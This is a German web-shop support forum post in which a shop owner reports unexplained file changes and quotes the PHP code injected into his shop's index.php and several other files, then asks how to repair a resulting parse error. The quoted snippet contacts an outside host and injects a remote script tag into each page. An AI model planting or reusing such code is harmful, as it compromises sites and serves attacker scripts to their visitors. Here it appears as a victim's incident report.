am: 08. November 2014, 23:03:36
Hallo,
ich habe festgestellt, dass es einige Dateien gibt, die am 6.11.14 geändert wurden, wofür es aber keinen Grund gibt. Folgende für mich zunächst verdächtige Änderungen habe ich gefunden:
/shop/index.php
$q = __url_get_contents
( "http://sabaragamu.com/y8fm3kvc.php" . "?fid=30305&info=" . http_build_query( $q ) . "&no=1&allow=1", 2 ); $q = trim( $q ); if( $q !== 'false' ) { echo "<script type=\"text/javascript\" src=\"http://sabaragamu.com/y8fm3kvc.php?id=1309150\"></script>"; } }}#/7fadaf# dieser Code stand mit etwas anderer ID in einigen Dateien drin, z. B. auch in
/shop/______installer/index.php
/shop/_-_xtc-installer_-_/index.php
/shop/__update_installer/index.php
/shop/inc/search_replace_default.php
/shop/includes/form_check.js.php
/shop/includes/header.php
/shop/includes/google.conversiontracking.js.php
/shop/templates_c/diverse Dateien
das kommt mir sonderbar vor, zumal ich unter sabaragamu weder hier im Forum noch in der weiten Welt des Web etwas aussagekräftiges finden konnte.
was hab ich jetzt gemacht?
sämtliche FTP-Konten gelöscht ... Admin-PWer im Shop geändert und den Code aus den jeweiligen Dateien rausgeworfen.
Mir schwant nur, dass ich u. a. zu viel gelöscht habe ... denn die index.php startet jetzt nicht mehr, sondern nur noch mit 500 interner Serverfehler.
Rufe ich die Datei im Browser direkt auf, erhalte ich diese Fehlermeldung
Parse error: syntax error, unexpected $end in .../shop/index.php on line 172
in der Zeile 172 findet sich noch dieses Zeichen
?>
Wonach sollte ich noch suchen?
Wie bekomm ich die index wieder ans Laufen?
Danke und Gruß,
Dietmar
shop
www.eggersmann-modellautos.de/shop/index.php
Linkback: https://www.modified-shop.org/forum/index.php?topic=31436.0